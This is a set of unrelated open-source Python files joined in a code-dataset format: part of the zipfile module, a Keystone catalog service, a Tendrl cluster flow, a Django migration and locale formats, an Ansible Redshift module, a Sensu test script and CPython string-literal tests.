zinfo.compress_size > ZIP64_LIMIT
if zip64 and not self._allowZip64:
raise LargeZipFile("Filesize would require ZIP64 extensions")
self.fp.write(zinfo.FileHeader(zip64))
self.fp.write(data)
if zinfo.flag_bits & 0x08:
# Write CRC and file sizes after the file data
fmt = '<LQQ' if zip64 else '<LLL'
self.fp.write(struct.pack(fmt, zinfo.CRC, zinfo.compress_size,
zinfo.file_size))
self.fp.flush()
self.filelist.append(zinfo)
self.NameToInfo[zinfo.filename] = zinfo
def __del__(self):
"""Call the "close()" method in case the user forgot."""
self.close()
def close(self):
"""Close the file, and for mode "w" and "a" write the ending
records."""
if self.fp is None:
return
try:
if self.mode in ("w", "a") and self._didModify: # write ending records
count = 0
pos1 = self.fp.tell()
for zinfo in self.filelist: # write central directory
count = count + 1
dt = zinfo.date_time
dosdate = (dt[0] - 1980) << 9 | dt[1] << 5 | dt[2]
dostime = dt[3] << 11 | dt[4] << 5 | (dt[5] // 2)
extra = []
if zinfo.file_size > ZIP64_LIMIT \
or zinfo.compress_size > ZIP64_LIMIT:
extra.append(zinfo.file_size)
extra.append(zinfo.compress_size)
file_size = 0xffffffff
compress_size = 0xffffffff
else:
file_size = zinfo.file_size
compress_size = zinfo.compress_size
if zinfo.header_offset > ZIP64_LIMIT:
extra.append(zinfo.header_offset)
header_offset = 0xffffffff
else:
header_offset = zinfo.header_offset
extra_data = zinfo.extra
min_version = 0
if extra:
# Append a ZIP64 field to the extra's
extra_data = struct.pack(
'<HH' + 'Q'*len(extra),
1, 8*len(extra), *extra) + extra_data
min_version = ZIP64_VERSION
if zinfo.compress_type == ZIP_BZIP2:
min_version = max(BZIP2_VERSION, min_version)
elif zinfo.compress_type == ZIP_LZMA:
min_version = max(LZMA_VERSION, min_version)
extract_version = max(min_version, zinfo.extract_version)
create_version = max(min_version, zinfo.create_version)
try:
filename, flag_bits = zinfo._encodeFilenameFlags()
centdir = struct.pack(structCentralDir,
stringCentralDir, create_version,
zinfo.create_system, extract_version, zinfo.reserved,
flag_bits, zinfo.compress_type, dostime, dosdate,
zinfo.CRC, compress_size, file_size,
len(filename), len(extra_data), len(zinfo.comment),
0, zinfo.internal_attr, zinfo.external_attr,
header_offset)
except DeprecationWarning:
print((structCentralDir, stringCentralDir, create_version,
zinfo.create_system, extract_version, zinfo.reserved,
zinfo.flag_bits, zinfo.compress_type, dostime, dosdate,
zinfo.CRC, compress_size, file_size,
len(zinfo.filename), len(extra_data), len(zinfo.comment),
0, zinfo.internal_attr, zinfo.external_attr,
header_offset), file=sys.stderr)
raise
self.fp.write(centdir)
self.fp.write(filename)
self.fp.write(extra_data)
self.fp.write(zinfo.comment)
pos2 = self.fp.tell()
# Write end-of-zip-archive record
centDirCount = count
centDirSize = pos2 - pos1
centDirOffset = pos1
if (centDirCount >= ZIP_FILECOUNT_LIMIT or
centDirOffset > ZIP64_LIMIT or
centDirSize > ZIP64_LIMIT):
# Need to write the ZIP64 end-of-archive records
zip64endrec = struct.pack(
structEndArchive64, stringEndArchive64,
44, 45, 45, 0, 0, centDirCount, centDirCount,
centDirSize, centDirOffset)
self.fp.write(zip64endrec)
zip64locrec = struct.pack(
structEndArchive64Locator,
stringEndArchive64Locator, 0, pos2, 1)
self.fp.write(zip64locrec)
centDirCount = min(centDirCount, 0xFFFF)
centDirSize = min(centDirSize, 0xFFFFFFFF)
centDirOffset = min(centDirOffset, 0xFFFFFFFF)
endrec = struct.pack(structEndArchive, stringEndArchive,
0, 0, centDirCount, centDirCount,
centDirSize, centDirOffset, len(self._comment))
self.fp.write(endrec)
self.fp.write(self._comment)
self.fp.flush()
finally:
fp = self.fp
self.fp = None
if not self._filePassed:
fp.close()
class PyZipFile(ZipFile):
"""Class to create ZIP archives with Python library files and packages."""
def __init__(self, file, mode="r", compression=ZIP_STORED,
allowZip64=False, optimize=-1):
ZipFile.__init__(self, file, mode=mode, compression=compression,
allowZip64=allowZip64)
self._optimize = optimize
def writepy(self, pathname, basename=""):
"""Add all files from "pathname" to the ZIP archive.
If pathname is a package directory, search the directory and
all package subdirectories recursively for all *.py and enter
the modules into the archive. If pathname is a plain
directory, listdir *.py and enter all modules. Else, pathname
must be a Python *.py file and the module will be put into the
archive. Added modules are always module.pyo or module.pyc.
This method will compile the module.py into module.pyc if
necessary.
"""
dir, name = os.path.split(pathname)
if os.path.isdir(pathname):
initname = os.path.join(pathname, "__init__.py")
if os.path.isfile(initname):
# This is a package directory, add it
if basename:
basename = "%s/%s" % (basename, name)
else:
basename = name
if self.debug:
print("Adding package in", pathname, "as", basename)
fname, arcname = self._get_codename(initname[0:-3], basename)
if self.debug:
print("Adding", arcname)
self.write(fname, arcname)
dirlist = os.listdir(pathname)
dirlist.remove("__init__.py")
# Add all *.py files and package subdirectories
for filename in dirlist:
path = os.path.join(pathname, filename)
root, ext = os.path.splitext(filename)
if os.path.isdir(path):
if os.path.isfile(os.path.join(path, "__init__.py")):
# This is a package directory, add it
self.writepy(path, basename) # Recursive call
elif ext == ".py":
fname, arcname = self._get_codename(path[0:-3],
basename)
if self.debug:
print("Adding", arcname)
self.write(fname, arcname)
else:
# This is NOT a package directory, add its files at top level
if self.debug:
print("Adding files from directory", pathname)
for filename in os.listdir(pathname):
path = os.path.join(pathname, filename)
root, ext = os.path.splitext(filename)
if ext == ".py":
fname, arcname = self._get_codename(path[0:-3],
basename)
if self.debug:
print("Adding", arcname)
self.write(fname, arcname)
else:
if pathname[-3:] != ".py":
raise RuntimeError(
'Files added with writepy() must end with ".py"')
fname, arcname = self._get_codename(pathname[0:-3], basename)
if self.debug:
print("Adding file", arcname)
self.write(fname, arcname)
def _get_codename(self, pathname, basename):
"""Return (filename, archivename) for the path.
Given a module name path, return the correct file path and
archive name, compiling if necessary. For example, given
/python/lib/string, return (/python/lib/string.pyc, string).
"""
def _compile(file, optimize=-1):
import py_compile
if self.debug:
print("Compiling", file)
try:
py_compile.compile(file, doraise=True, optimize=optimize)
except py_compile.PyCompileError as err:
print(err.msg)
return False
return True
file_py = pathname + ".py"
file_pyc = pathname + ".pyc"
file_pyo = pathname + ".pyo"
pycache_pyc = imp.cache_from_source(file_py, True)
pycache_pyo = imp.cache_from_source(file_py, False)
if self._optimize == -1:
# legacy mode: use whatever file is present
if (os.path.isfile(file_pyo) and
os.stat(file_pyo).st_mtime >= os.stat(file_py).st_mtime):
# Use .pyo file.
arcname = fname = file_pyo
elif (os.path.isfile(file_pyc) and
os.stat(file_pyc).st_mtime >= os.stat(file_py).st_mtime):
# Use .pyc file.
arcname = fname = file_pyc
elif (os.path.isfile(pycache_pyc) and
os.stat(pycache_pyc).st_mtime >= os.stat(file_py).st_mtime):
# Use the __pycache__/*.pyc file, but write it to the legacy pyc
# file name in the archive.
fname = pycache_pyc
arcname = file_pyc
elif (os.path.isfile(pycache_pyo) and
os.stat(pycache_pyo).st_mtime >= os.stat(file_py).st_mtime):
# Use the __pycache__/*.pyo file, but write it to the legacy pyo
# file name in the archive.
fname = pycache_pyo
arcname = file_pyo
else:
# Compile py into PEP 3147 pyc file.
if _compile(file_py):
fname = (pycache_pyc if __debug__ else pycache_pyo)
arcname = (file_pyc if __debug__ else file_pyo)
else:
fname = arcname = file_py
else:
# new mode: use given optimization level
if self._optimize == 0:
fname = pycache_pyc
arcname = file_pyc
else:
fname = pycache_pyo
arcname = file_pyo
if not (os.path.isfile(fname) and
os.stat(fname).st_mtime >= os.stat(file_py).st_mtime):
if not _compile(file_py, optimize=self._optimize):
fname = arcname = file_py
archivename = os.path.split(arcname)[1]
if basename:
archivename = "%s/%s" % (basename, archivename)
return (fname, archivename)
def main(args = None):
import textwrap
USAGE=textwrap.dedent("""\
Usage:
zipfile.py -l zipfile.zip # Show listing of a zipfile
zipfile.py -t zipfile.zip # Test if a zipfile is valid
zipfile.py -e zipfile.zip target # Extract zipfile into target dir
zipfile.py -c zipfile.zip src ... # Create zipfile from sources
""")
if args is None:
args = sys.argv[1:]
if not args or args[0] not in ('-l', '-c', '-e', '-t'):
print(USAGE)
sys.exit(1)
if args[0] == '-l':
if len(args) != 2:
print(USAGE)
sys.exit(1)
with ZipFile(args[1], 'r') as zf:
zf.printdir()
elif args[0] == '-t':
if len(args) != 2:
print(USAGE)
sys.exit(1)
with ZipFile(args[1], 'r') as zf:
badfile = zf.testzip()
if badfile:
print("The following enclosed file is corrupted: {!r}".format(badfile))
print("Done testing")
elif args[0] == '-e':
if len(args) != 3:
print(USAGE)
sys.exit(1)
with ZipFile(args[1], 'r') as zf:
out = args[2]
for path in zf.namelist():
if path.startswith('./'):
tgt = os.path.join(out, path[2:])
else:
tgt = os.path.join(out, path)
tgtdir = os.path.dirname(tgt)
if not os.path.exists(tgtdir):
os.makedirs(tgtdir)
with open(tgt, 'wb') as fp:
fp.write(zf.read(path))
elif args[0] == '-c':
if len(args) < 3:
print(USAGE)
sys.exit(1)
def addToZip(zf, path, zippath):
if os.path.isfile(path):
zf.write(path, zippath, ZIP_DEFLATED)
elif os.path.isdir(path):
for nm in os.listdir(path):
addToZip(zf,
os.path.join(path, nm), os.path.join(zippath, nm))
# else: ignore
with ZipFile(args[1], 'w', allowZip64=True) as zf:
for src in args[2:]:
addToZip(zf, src, os.path.basename(src))
if __name__ == "__main__":
main()
|
ioram7/keystone-federado-pgid2013 | refs/heads/master | keystone/catalog/core.py | 5 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack LLC
# Copyright 2012 Canonical Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Main entry point into the Catalog service."""
from keystone.common import dependency
from keystone.common import logging
from keystone.common import manager
from keystone import config
from keystone import exception
CONF = config.CONF
LOG = logging.getLogger(__name__)
def format_url(url, data):
    """Helper method for all backend catalogs to deal with URLs."""
try:
result = url.replace('$(', '%(') % data
except AttributeError:
return None
except KeyError as e:
LOG.error(_("Malformed endpoint %(url)s - unknown key %(keyerror)s") %
{"url": url,
"keyerror": str(e)})
raise exception.MalformedEndpoint(endpoint=url)
except TypeError as e:
        LOG.error(_("Malformed endpoint %(url)s - unknown key %(keyerror)s "
                    "(are you missing brackets?)") %
{"url": url,
"keyerror": str(e)})
raise exception.MalformedEndpoint(endpoint=url)
except ValueError as e:
        LOG.error(_("Malformed endpoint %s - incomplete format "
                    "(are you missing a type notifier?)") % url)
raise exception.MalformedEndpoint(endpoint=url)
return result
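# A minimal usage sketch for format_url (hypothetical endpoint and data):
#   format_url('http://$(host)s:8774/v1.1/$(tenant_id)s',
#              {'host': 'localhost', 'tenant_id': 'abc123'})
#   -> 'http://localhost:8774/v1.1/abc123'
# Unknown keys or stray format specifiers raise exception.MalformedEndpoint.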
@dependency.provider('catalog_api')
class Manager(manager.Manager):
"""Default pivot point for the Catalog backend.
See :mod:`keystone.common.manager.Manager` for more details on how this
dynamically calls the backend.
"""
def __init__(self):
super(Manager, self).__init__(CONF.catalog.driver)
def get_service(self, context, service_id):
try:
return self.driver.get_service(service_id)
except exception.NotFound:
raise exception.ServiceNotFound(service_id=service_id)
def delete_service(self, context, service_id):
try:
return self.driver.delete_service(service_id)
except exception.NotFound:
raise exception.ServiceNotFound(service_id=service_id)
def create_endpoint(self, context, endpoint_id, endpoint_ref):
try:
return self.driver.create_endpoint(endpoint_id, endpoint_ref)
except exception.NotFound:
service_id = endpoint_ref.get('service_id')
raise exception.ServiceNotFound(service_id=service_id)
def delete_endpoint(self, context, endpoint_id):
try:
return self.driver.delete_endpoint(endpoint_id)
except exception.NotFound:
raise exception.EndpointNotFound(endpoint_id=endpoint_id)
def get_endpoint(self, context, endpoint_id):
try:
return self.driver.get_endpoint(endpoint_id)
except exception.NotFound:
raise exception.EndpointNotFound(endpoint_id=endpoint_id)
def get_catalog(self, context, user_id, tenant_id, metadata=None):
try:
return self.driver.get_catalog(user_id, tenant_id, metadata)
except exception.NotFound:
raise exception.NotFound('Catalog not found for user and tenant')
class Driver(object):
    """Interface description for a Catalog driver."""
def create_service(self, service_id, service_ref):
"""Creates a new service.
:raises: keystone.exception.Conflict
"""
raise exception.NotImplemented()
def list_services(self):
"""List all services.
:returns: list of service_refs or an empty list.
"""
raise exception.NotImplemented()
def get_service(self, service_id):
"""Get service by id.
:returns: service_ref dict
:raises: keystone.exception.ServiceNotFound
"""
raise exception.NotImplemented()
def update_service(self, service_id):
"""Update service by id.
:returns: service_ref dict
:raises: keystone.exception.ServiceNotFound
"""
raise exception.NotImplemented()
def delete_service(self, service_id):
"""Deletes an existing service.
:raises: keystone.exception.ServiceNotFound
"""
raise exception.NotImplemented()
def create_endpoint(self, endpoint_id, endpoint_ref):
"""Creates a new endpoint for a service.
:raises: keystone.exception.Conflict,
keystone.exception.ServiceNotFound
"""
raise exception.NotImplemented()
def get_endpoint(self, endpoint_id):
"""Get endpoint by id.
:returns: endpoint_ref dict
:raises: keystone.exception.EndpointNotFound
"""
raise exception.NotImplemented()
def list_endpoints(self):
"""List all endpoints.
:returns: list of endpoint_refs or an empty list.
"""
raise exception.NotImplemented()
def update_endpoint(self, endpoint_id, endpoint_ref):
"""Get endpoint by id.
:returns: endpoint_ref dict
:raises: keystone.exception.EndpointNotFound
keystone.exception.ServiceNotFound
"""
raise exception.NotImplemented()
def delete_endpoint(self, endpoint_id):
"""Deletes an endpoint for a service.
:raises: keystone.exception.EndpointNotFound
"""
raise exception.NotImplemented()
def get_catalog(self, user_id, tenant_id, metadata=None):
"""Retrieve and format the current service catalog.
Example::
{ 'RegionOne':
{'compute': {
'adminURL': u'http://host:8774/v1.1/tenantid',
'internalURL': u'http://host:8774/v1.1/tenant_id',
'name': 'Compute Service',
'publicURL': u'http://host:8774/v1.1/tenantid'},
'ec2': {
'adminURL': 'http://host:8773/services/Admin',
'internalURL': 'http://host:8773/services/Cloud',
'name': 'EC2 Service',
'publicURL': 'http://host:8773/services/Cloud'}}
:returns: A nested dict representing the service catalog or an
empty dict.
:raises: keystone.exception.NotFound
"""
raise exception.NotImplemented()
def get_v3_catalog(self, user_id, tenant_id, metadata=None):
"""Retrieve and format the current V3 service catalog.
Example::
[
{
"endpoints": [
{
"interface": "public",
"id": "--endpoint-id--",
"region": "RegionOne",
"url": "http://external:8776/v1/--project-id--"
},
{
"interface": "internal",
"id": "--endpoint-id--",
"region": "RegionOne",
"url": "http://internal:8776/v1/--project-id--"
}],
"id": "--service-id--",
"type": "volume"
}]
:returns: A list representing the service catalog or an empty list
:raises: keystone.exception.NotFound
"""
raise exception.NotImplemented()
|
Tendrl/commons | refs/heads/master | tendrl/commons/flows/unmanage_cluster/__init__.py | 1 | import sys
import traceback
from tendrl.commons import flows
from tendrl.commons.flows.exceptions import FlowExecutionFailedError
from tendrl.commons.objects import AtomExecutionFailedError
class UnmanageCluster(flows.BaseFlow):
def __init__(self, *args, **kwargs):
super(UnmanageCluster, self).__init__(*args, **kwargs)
def run(self):
integration_id = self.parameters['TendrlContext.integration_id']
_cluster = NS.tendrl.objects.Cluster(
integration_id=integration_id
).load()
if _cluster.is_managed == "no":
if _cluster.current_job['job_name'] == self.__class__.__name__ \
and _cluster.current_job['status'] == 'finished':
raise FlowExecutionFailedError(
"Cluster is already in un-managed state"
)
if _cluster.current_job['status'] == 'in_progress' and \
(
'job_id' in _cluster.locked_by and
_cluster.locked_by['job_id'] != ""
) and (
_cluster.status in ['importing', 'unmanaging', 'expanding']
):
raise FlowExecutionFailedError(
"Another job in progress for cluster."
" Please wait till the job finishes "
"(job_id: %s) (cluster: %s) " %
(
_cluster.current_job['job_id'],
_cluster.short_name
)
)
_lock_details = {
'node_id': NS.node_context.node_id,
'fqdn': NS.node_context.fqdn,
'tags': NS.node_context.tags,
'type': NS.type,
'job_name': self.__class__.__name__,
'job_id': self.job_id
}
_cluster.locked_by = _lock_details
_cluster.status = "unmanaging"
_cluster.current_job = {
'job_id': self.job_id,
'job_name': self.__class__.__name__,
'status': "in_progress"
}
_cluster.save()
try:
super(UnmanageCluster, self).run()
_cluster = NS.tendrl.objects.Cluster(
integration_id=integration_id
).load()
_cluster.status = ""
_cluster.is_managed = "no"
_cluster.locked_by = {}
_cluster.errors = []
_cluster.current_job = {
'status': "finished",
'job_name': self.__class__.__name__,
'job_id': self.job_id
}
_cluster.save()
except (FlowExecutionFailedError,
AtomExecutionFailedError,
Exception) as ex:
exc_type, exc_value, exc_traceback = sys.exc_info()
_cluster = NS.tendrl.objects.Cluster(
integration_id=integration_id
).load()
_cluster.status = ""
_cluster.locked_by = {}
_cluster.current_job = {
'status': "failed",
'job_name': self.__class__.__name__,
'job_id': self.job_id
}
_errors = []
if hasattr(ex, 'message'):
_errors = [ex.message]
else:
_errors = [str(ex)]
if _errors:
_cluster.errors = _errors
_cluster.save()
raise FlowExecutionFailedError(str(
traceback.format_exception(exc_type,
exc_value,
exc_traceback)
))
|
WebCampZg/conference-web | refs/heads/master | cfp/migrations/0012_auto_20170523_1411.py | 1 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-05-23 12:11
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cfp', '0011_auto_20170523_1353'),
]
operations = [
migrations.AlterField(
model_name='paperapplication',
name='about',
field=models.TextField(help_text='Describe your talk in 140 characters or less. Plain text only. [Public]', verbose_name="What's it about"),
),
migrations.AlterField(
model_name='paperapplication',
name='abstract',
            field=models.TextField(help_text='You may go in more depth here. Up to 10 sentences, use Markdown. [Public]', verbose_name='Abstract'),
),
]
|
davemcphee/sensu-pager-handler | refs/heads/master | python-handler/test_handler.py | 1 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# run this on sensu server to check what kind of output we get fed from main proc
import logging
logging.basicConfig(level=logging.DEBUG)
import os
import sys
LOG = logging.getLogger(__name__)
what_i_got = sys.argv
LOG.debug("argsv\t\t{}".format(str(what_i_got)))
LOG.debug("join\t\t{}".format(' '.join(what_i_got)))
|
caveman-dick/ansible | refs/heads/devel | lib/ansible/modules/cloud/amazon/redshift_subnet_group.py | 24 | #!/usr/bin/python
# Copyright 2014 Jens Carl, Hothead Games Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
author:
- "Jens Carl (@j-carl), Hothead Games Inc."
module: redshift_subnet_group
version_added: "2.2"
short_description: manage Redshift cluster subnet groups
description:
    - Creates, modifies, and deletes Redshift cluster subnet groups.
options:
state:
description:
      - Specifies whether the subnet group should be present or absent.
default: 'present'
choices: ['present', 'absent' ]
group_name:
description:
- Cluster subnet group name.
required: true
aliases: ['name']
group_description:
description:
- Database subnet group description.
required: false
default: null
aliases: ['description']
group_subnets:
description:
- List of subnet IDs that make up the cluster subnet group.
required: false
default: null
aliases: ['subnets']
requirements: [ 'boto' ]
extends_documentation_fragment: aws
'''
EXAMPLES = '''
# Create a Redshift subnet group
- local_action:
module: redshift_subnet_group
state: present
group_name: redshift-subnet
group_description: Redshift subnet
group_subnets:
- 'subnet-aaaaa'
- 'subnet-bbbbb'
# Remove subnet group
- redshift_subnet_group:
state: absent
group_name: redshift-subnet
'''
RETURN = '''
group:
description: dictionary containing all Redshift subnet group information
returned: success
type: complex
contains:
name:
description: name of the Redshift subnet group
returned: success
type: string
sample: "redshift_subnet_group_name"
vpc_id:
description: Id of the VPC where the subnet is located
returned: success
type: string
sample: "vpc-aabb1122"
'''
try:
import boto
import boto.redshift
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import HAS_BOTO, connect_to_aws, ec2_argument_spec, get_aws_connection_info
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
state=dict(required=True, choices=['present', 'absent']),
group_name=dict(required=True, aliases=['name']),
group_description=dict(required=False, aliases=['description']),
group_subnets=dict(required=False, aliases=['subnets'], type='list'),
))
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO:
module.fail_json(msg='boto v2.9.0+ required for this module')
state = module.params.get('state')
group_name = module.params.get('group_name')
group_description = module.params.get('group_description')
group_subnets = module.params.get('group_subnets')
if state == 'present':
for required in ('group_name', 'group_description', 'group_subnets'):
if not module.params.get(required):
module.fail_json(msg=str("parameter %s required for state='present'" % required))
else:
for not_allowed in ('group_description', 'group_subnets'):
if module.params.get(not_allowed):
module.fail_json(msg=str("parameter %s not allowed for state='absent'" % not_allowed))
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
if not region:
module.fail_json(msg=str("region not specified and unable to determine region from EC2_REGION."))
# Connect to the Redshift endpoint.
try:
conn = connect_to_aws(boto.redshift, region, **aws_connect_params)
except boto.exception.JSONResponseError as e:
module.fail_json(msg=str(e))
try:
changed = False
exists = False
group = None
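        # Probe for an existing subnet group first; a
        # ClusterSubnetGroupNotFoundFault only means the group does not exist
        # yet, so it is not treated as a fatal error.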
try:
matching_groups = conn.describe_cluster_subnet_groups(group_name, max_records=100)
exists = len(matching_groups) > 0
except boto.exception.JSONResponseError as e:
if e.body['Error']['Code'] != 'ClusterSubnetGroupNotFoundFault':
# if e.code != 'ClusterSubnetGroupNotFoundFault':
module.fail_json(msg=str(e))
if state == 'absent':
if exists:
conn.delete_cluster_subnet_group(group_name)
changed = True
else:
if not exists:
new_group = conn.create_cluster_subnet_group(group_name, group_description, group_subnets)
group = {
'name': new_group['CreateClusterSubnetGroupResponse']['CreateClusterSubnetGroupResult']
['ClusterSubnetGroup']['ClusterSubnetGroupName'],
'vpc_id': new_group['CreateClusterSubnetGroupResponse']['CreateClusterSubnetGroupResult']
['ClusterSubnetGroup']['VpcId'],
}
else:
changed_group = conn.modify_cluster_subnet_group(group_name, group_subnets, description=group_description)
group = {
'name': changed_group['ModifyClusterSubnetGroupResponse']['ModifyClusterSubnetGroupResult']
['ClusterSubnetGroup']['ClusterSubnetGroupName'],
'vpc_id': changed_group['ModifyClusterSubnetGroupResponse']['ModifyClusterSubnetGroupResult']
['ClusterSubnetGroup']['VpcId'],
}
changed = True
except boto.exception.JSONResponseError as e:
module.fail_json(msg=str(e))
module.exit_json(changed=changed, group=group)
if __name__ == '__main__':
main()
|
darkryder/django | refs/heads/master | django/conf/locale/hi/formats.py | 619 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j F Y'
TIME_FORMAT = 'g:i A'
# DATETIME_FORMAT =
# YEAR_MONTH_FORMAT =
MONTH_DAY_FORMAT = 'j F'
SHORT_DATE_FORMAT = 'd-m-Y'
# SHORT_DATETIME_FORMAT =
# FIRST_DAY_OF_WEEK =
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
# DATE_INPUT_FORMATS =
# TIME_INPUT_FORMATS =
# DATETIME_INPUT_FORMATS =
DECIMAL_SEPARATOR = '.'
THOUSAND_SEPARATOR = ','
# NUMBER_GROUPING =
|
unseenlaser/python-for-android | refs/heads/master | python3-alpha/python3-src/Lib/test/test_strlit.py | 48 | r"""Test correct treatment of various string literals by the parser.
There are four types of string literals:
'abc' -- normal str
r'abc' -- raw str
b'xyz' -- normal bytes
br'xyz' -- raw bytes
The difference between normal and raw strings is of course that in a
raw string, \ escapes (while still used to determine the end of the
literal) are not interpreted, so that r'\x00' contains four
characters: a backslash, an x, and two zeros; while '\x00' contains a
single character (code point zero).
The tricky thing is what should happen when non-ASCII bytes are used
inside literals. For bytes literals, this is considered illegal. But
for str literals, those bytes are supposed to be decoded using the
encoding declared for the file (UTF-8 by default).
We have to test this with various file encodings. We also test it with
exec()/eval(), which uses a different code path.
This file is really about correct treatment of encodings and
backslashes. It doesn't concern itself with issues like single
vs. double quotes or singly- vs. triply-quoted strings: that's dealt
with elsewhere (I assume).
"""
import os
import sys
import shutil
import tempfile
import unittest
TEMPLATE = r"""# coding: %s
a = 'x'
assert ord(a) == 120
b = '\x01'
assert ord(b) == 1
c = r'\x01'
assert list(map(ord, c)) == [92, 120, 48, 49]
d = '\x81'
assert ord(d) == 0x81
e = r'\x81'
assert list(map(ord, e)) == [92, 120, 56, 49]
f = '\u1881'
assert ord(f) == 0x1881
g = r'\u1881'
assert list(map(ord, g)) == [92, 117, 49, 56, 56, 49]
"""
def byte(i):
return bytes([i])
class TestLiterals(unittest.TestCase):
def setUp(self):
self.save_path = sys.path[:]
self.tmpdir = tempfile.mkdtemp()
sys.path.insert(0, self.tmpdir)
def tearDown(self):
sys.path = self.save_path
shutil.rmtree(self.tmpdir, ignore_errors=True)
def test_template(self):
# Check that the template doesn't contain any non-printables
# except for \n.
for c in TEMPLATE:
assert c == '\n' or ' ' <= c <= '~', repr(c)
def test_eval_str_normal(self):
self.assertEqual(eval(""" 'x' """), 'x')
self.assertEqual(eval(r""" '\x01' """), chr(1))
self.assertEqual(eval(""" '\x01' """), chr(1))
self.assertEqual(eval(r""" '\x81' """), chr(0x81))
self.assertEqual(eval(""" '\x81' """), chr(0x81))
self.assertEqual(eval(r""" '\u1881' """), chr(0x1881))
self.assertEqual(eval(""" '\u1881' """), chr(0x1881))
def test_eval_str_raw(self):
self.assertEqual(eval(""" r'x' """), 'x')
self.assertEqual(eval(r""" r'\x01' """), '\\' + 'x01')
self.assertEqual(eval(""" r'\x01' """), chr(1))
self.assertEqual(eval(r""" r'\x81' """), '\\' + 'x81')
self.assertEqual(eval(""" r'\x81' """), chr(0x81))
self.assertEqual(eval(r""" r'\u1881' """), '\\' + 'u1881')
self.assertEqual(eval(""" r'\u1881' """), chr(0x1881))
def test_eval_bytes_normal(self):
self.assertEqual(eval(""" b'x' """), b'x')
self.assertEqual(eval(r""" b'\x01' """), byte(1))
self.assertEqual(eval(""" b'\x01' """), byte(1))
self.assertEqual(eval(r""" b'\x81' """), byte(0x81))
self.assertRaises(SyntaxError, eval, """ b'\x81' """)
self.assertEqual(eval(r""" b'\u1881' """), b'\\' + b'u1881')
self.assertRaises(SyntaxError, eval, """ b'\u1881' """)
def test_eval_bytes_raw(self):
self.assertEqual(eval(""" br'x' """), b'x')
self.assertEqual(eval(r""" br'\x01' """), b'\\' + b'x01')
self.assertEqual(eval(""" br'\x01' """), byte(1))
self.assertEqual(eval(r""" br'\x81' """), b"\\" + b"x81")
self.assertRaises(SyntaxError, eval, """ br'\x81' """)
self.assertEqual(eval(r""" br'\u1881' """), b"\\" + b"u1881")
self.assertRaises(SyntaxError, eval, """ br'\u1881' """)
def check_encoding(self, encoding, extra=""):
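        # Helper: write TEMPLATE (plus any extra source) to a temporary module
        # in the given encoding, then import it so the assertions inside
        # TEMPLATE are executed under that encoding.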
modname = "xx_" + encoding.replace("-", "_")
fn = os.path.join(self.tmpdir, modname + ".py")
f = open(fn, "w", encoding=encoding)
try:
f.write(TEMPLATE % encoding)
f.write(extra)
finally:
f.close()
__import__(modname)
del sys.modules[modname]
def test_file_utf_8(self):
extra = "z = '\u1234'; assert ord(z) == 0x1234\n"
self.check_encoding("utf-8", extra)
def test_file_utf_8_error(self):
extra = "b'\x80'\n"
self.assertRaises(SyntaxError, self.check_encoding, "utf-8", extra)
def test_file_utf8(self):
self.check_encoding("utf8")
def test_file_iso_8859_1(self):
self.check_encoding("iso-8859-1")
def test_file_latin_1(self):
self.check_encoding("latin-1")
def test_file_latin9(self):
self.check_encoding("latin9")
if __name__ == "__main__":
# Hack so that error messages containing non-ASCII can be printed
sys.stdout._encoding = sys.stderr._encoding = "utf-8"
unittest.main()
|